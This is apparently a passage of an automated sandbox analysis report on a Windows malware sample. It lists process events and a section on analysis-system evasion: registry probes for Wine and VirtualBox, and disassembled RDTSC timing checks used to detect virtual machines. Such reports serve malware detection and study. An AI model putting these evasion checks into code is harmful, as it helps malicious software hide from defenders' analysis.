Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CECB6 second address: 9CECBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CECBB second address: 9CECC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FF624B4E7D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CECC5 second address: 9CECC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CECC9 second address: 9CECE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF624B4E7E2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CECE8 second address: 9CECEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CECEC second address: 9CECF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CECF2 second address: 9CECFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FF624C752F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B46A9A second address: B46A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B46A9F second address: B46AA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B46AA5 second address: B46AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B46AA9 second address: B46AB3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF624C752F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B46C2B second address: B46C2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B46D5D second address: B46D72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF624C752F6h 0x0000000a jmp 00007FF624C752FBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B48D6C second address: B48D70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B48D70 second address: B48D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B48D76 second address: B48D88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B48E04 second address: B48E44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c xor ch, 00000042h 0x0000000f call 00007FF624C752F9h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF624C75302h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B48F51 second address: B48F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FF624B4E7D6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B48F5E second address: B48F6C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B48F6C second address: B48F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B48F70 second address: B48F8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B49044 second address: B49062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jc 00007FF624B4E7D6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 popad 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007FF624B4E7D8h 0x0000001c push esi 0x0000001d pop esi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B49062 second address: B490E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jno 00007FF624C752FEh 0x00000013 pop eax 0x00000014 jmp 00007FF624C75302h 0x00000019 push 00000003h 0x0000001b mov edx, eax 0x0000001d push 00000000h 0x0000001f mov edx, 6DB888C0h 0x00000024 push 00000003h 0x00000026 jmp 00007FF624C75302h 0x0000002b call 00007FF624C752F9h 0x00000030 pushad 0x00000031 jbe 00007FF624C752F8h 0x00000037 js 00007FF624C752FCh 0x0000003d je 00007FF624C752F6h 0x00000043 popad 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 je 00007FF624C752F6h 0x0000004e push eax 0x0000004f pop eax 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B490E4 second address: B490FD instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF624B4E7DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B490FD second address: B49101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B49101 second address: B49141 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b jp 00007FF624B4E7D6h 0x00000011 jmp 00007FF624B4E7DFh 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007FF624B4E7E0h 0x0000001d push edx 0x0000001e pop edx 0x0000001f popad 0x00000020 popad 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push esi 0x0000002a pop esi 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B49141 second address: B49147 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67B85 second address: B67B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FF624B4E7E0h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67D5D second address: B67D63 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67D63 second address: B67D83 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF624B4E7D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FF624B4E7D8h 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007FF624B4E7D6h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67D83 second address: B67D89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67D89 second address: B67D8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67D8F second address: B67D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF624C752F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67F12 second address: B67F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67F1E second address: B67F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B68252 second address: B68258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B68258 second address: B6825C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B683AC second address: B683B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B68928 second address: B6892F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B68E8D second address: B68E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6914C second address: B6915A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 jc 00007FF624C752F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6915A second address: B69167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jg 00007FF624B4E7DCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B692CB second address: B692E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF624C75304h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B692E5 second address: B6930B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E9h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007FF624B4E7D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6959D second address: B695B8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF624C752FAh 0x00000008 push edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jg 00007FF624C752FCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B695B8 second address: B695C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF624B4E7D8h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B695C8 second address: B695CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B736E1 second address: B736FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624B4E7DDh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B736FB second address: B736FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73813 second address: B73817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73817 second address: B7382E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a js 00007FF624C752F6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7382E second address: B73832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73832 second address: B73838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73DD5 second address: B73DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73DD9 second address: B73DF3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF624C752F6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF624C752FCh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73DF3 second address: B73DFD instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF624B4E7D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B774A8 second address: B774AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B774AC second address: B774B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B77B54 second address: B77B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B77C36 second address: B77C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B780D0 second address: B780E5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF624C752FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B781B3 second address: B781B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B781B7 second address: B781CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jns 00007FF624C752F6h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B781CA second address: B781D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7824F second address: B78253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78253 second address: B78259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78259 second address: B78273 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FF624C752FAh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78273 second address: B78278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78278 second address: B7827E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7827E second address: B78282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78603 second address: B78609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7878B second address: B78790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78790 second address: B787F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007FF624C752F6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FF624C752F8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 movsx esi, dx 0x0000002c jmp 00007FF624C75309h 0x00000031 xchg eax, ebx 0x00000032 jg 00007FF624C75300h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push ecx 0x0000003d pop ecx 0x0000003e jg 00007FF624C752F6h 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B787F7 second address: B7880A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7DFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7DA78 second address: B7DA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7DA7C second address: B7DA80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7DA80 second address: B7DA86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7DA86 second address: B7DA90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF624B4E7D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7F9D8 second address: B7F9DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7F9DC second address: B7F9E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B81003 second address: B8106D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007FF624C752F6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov di, C74Ah 0x00000013 adc ebx, 47C85D40h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007FF624C752F8h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 push esi 0x00000036 pushad 0x00000037 add dword ptr [ebp+124517A8h], ecx 0x0000003d mov dword ptr [ebp+122D19B0h], edi 0x00000043 popad 0x00000044 pop ebx 0x00000045 pushad 0x00000046 mov ecx, dword ptr [ebp+122D183Dh] 0x0000004c movzx ecx, si 0x0000004f popad 0x00000050 push 00000000h 0x00000052 add edi, dword ptr [ebp+122D1D70h] 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d jne 00007FF624C752F6h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8106D second address: B81073 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8653D second address: B86542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
